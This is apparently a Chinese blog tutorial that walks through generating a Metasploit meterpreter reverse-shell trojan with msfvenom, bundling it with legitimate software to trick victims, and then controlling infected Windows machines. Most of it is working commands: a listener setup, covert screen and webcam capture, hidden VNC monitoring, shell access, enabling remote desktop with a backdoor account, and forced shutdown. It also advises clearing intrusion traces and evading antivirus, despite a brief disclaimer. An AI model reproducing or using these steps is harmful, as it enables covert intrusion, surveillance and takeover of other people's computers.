Kali Linux利用metasploit生成木马入侵Windows系统

写在前面:此木马试了很多方法都还是会被360安全卫士、腾讯安全管家等杀毒软件查杀,所以本文的木马不具备免杀功能,大神可自行研究。本文仅供参考学习,请勿用做非法用途,造成的一切后果自行承担。

准备环境

入侵机器:Kali Linux 2019.4 64位
肉鸡:Windows 7 64位

本机IP

首先我们来看一下入侵机器的IP地址.
终端输入:ifconfig

  • 图中红色方框内就是我们的入侵机器的IP了,下面会用到。

生成木马

终端输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.140 LPORT=4444 -f exe -o God.exe

参数解释:

  • -p:指定payload

  • LHOST:本机IP (这里入侵机器的IP为:”192.168.211.140”,根据使用ifconfig命令得出的IP地址自行更改)

  • LPORT:指定监听端口 (这里指定的监听端口为:4444)

  • -f:指定文件类型

  • -o:指定输出的木马文件名 (这里木马名叫做God,可随意更改)

  • 命令执行完毕后我们root目录下会生成一个名为God的exe程序文件,可想而知,这个便就是我们的木马文件了。

msfconsole监听

  1. 终端输入:msfconsole

  2. 使用监听模块:use exploit/multi/handler

  3. 设置payload:set payload windows/meterpreter/reverse_tcp

  4. 设置入侵机kali linux的IP地址:set lhost 192.168.96.128 (ip要与生成木马时的ip一致)

  5. 设置监听端口:set lport 4444 (端口要与生成木马时的端口一致)

  1. 开始监听:exploit

肉鸡安装木马

  • 把刚刚生成的木马文件放到我们的肉鸡当中,可以使用捆绑软件将木马文件和我们的正常程序文件捆绑在一起,下面我们把刚刚生成的木马文件和360安全卫士捆绑在一起,因为没有做免杀360安全卫士报毒了,需要免杀的大神可自行研究。
  • 如果肉鸡是普通用户的电脑并且没有安装杀毒软件或是忽略了杀毒软件的提示的话,点开了被我们木马感染的应用程序,运行了正常应用程序的同时也运行了我们的木马文件,在不知不觉间就成为了我们的囊中之物。

控制肉鸡

如果肉鸡成功的运行了我们的木马文件并且我们入侵机Kali Linux在监听状态下的话,入侵机就会产生一个meterpreter会话,参考下图

这时我们就可以对肉鸡进行控制了

  1. 终端输入 sysinfo 可以获取到肉鸡的基本信息
  1. 终端输入 screenshot 可以获取到肉鸡屏幕的截图,截图默认保存在root文件夹当中
  1. 终端输入 webcam_list 可以查看肉鸡有几个摄像头,如果肉鸡有摄像头的话终端输入 webcam_stream 可以获取到肉鸡摄像头视频
  • 由于这里的肉鸡是windons 7,没有摄像头,所以这里无法演示。

4.终端输入 dir 可以查看肉鸡上的文件

  • 因为木马程序的位置是在桌面,所以获取到了桌面下的所有文件。

5.我们可以在肉鸡上启动某个程序,命令为 execute ,比如启动肉鸡上的计算器,终端输入 execute -f calc.exe ,回到肉鸡中,计算器已被启动

6.终端输入 run vnc 可查看肉鸡的实时屏幕,并且被监视的肉鸡本身并不会发生任何变化,不知不觉间就被我们监视了

7.终端输入 shell 可以进入肉鸡的命令行,这里你可在对方的电脑上执行一些cmd命令,当然,我们的一系列操作普通用户是看不到的,命令行输入 ipconfig 查看一下肉鸡的IP,下面会用到。

8.终端输入 ps 可以看到肉鸡当前正在运行的程序,你可以用 run post/windows/manage/migrate 将进程迁移到其他程序,也可以将其他程序关闭

9.进入肉鸡的远程桌面,实现远程控制,首先开启肉鸡的3389远程桌面,终端输入 run getgui -e 即可开启

10.成功开启了肉鸡的3389远程桌面后我们在肉鸡上新建一个用来登陆远程桌面的帐户,终端输入 run getgui -u God -p 123456

  • 这里新建了一个用户名为 God ,密码为 123456 的帐户

11.我们新建一个终端窗口,终端输入 rdesktop -u God -p 123456 192.168.211.132:3389 登录肉鸡远程桌面。命令中的God为刚刚创建的登录用户名,123456为刚刚创建的登录密码,192.168.96.129为肉鸡的IP地址,根据自己创建的帐户和肉鸡的IP自行更改

这个时候就可以像操作自己电脑一样操控肉鸡,你可以利用他做任何你想要做事情,如果做什么特殊的事情切记要记得清理一下入侵痕迹并且做好防御防止自己被反追踪,具体如何防御我就不细说了,这里只讲入侵,其余的请自行百度解决。

12.终端输入输入 shutdown 可以强制将肉鸡电脑关机

  • 回到肉鸡中可以看到肉鸡关机了

总结

  • metasploit这个渗透框架功能十分强大,这里只讲述了部分常用功能,更多的功能你们可以自行尝试。
  • 这里不足之处就是这个木马不能免杀,安装有腾讯安全卫士或者360安全卫士的电脑能立马查杀出来。当然还有其他的免杀方式,或者也可以用powershell来达到免杀效果,杀毒软件一般是无法查杀的。
分享到:

评论完整模式加载中...如果长时间无法加载,请针对 disq.us | disquscdn.com | disqus.com 启用代理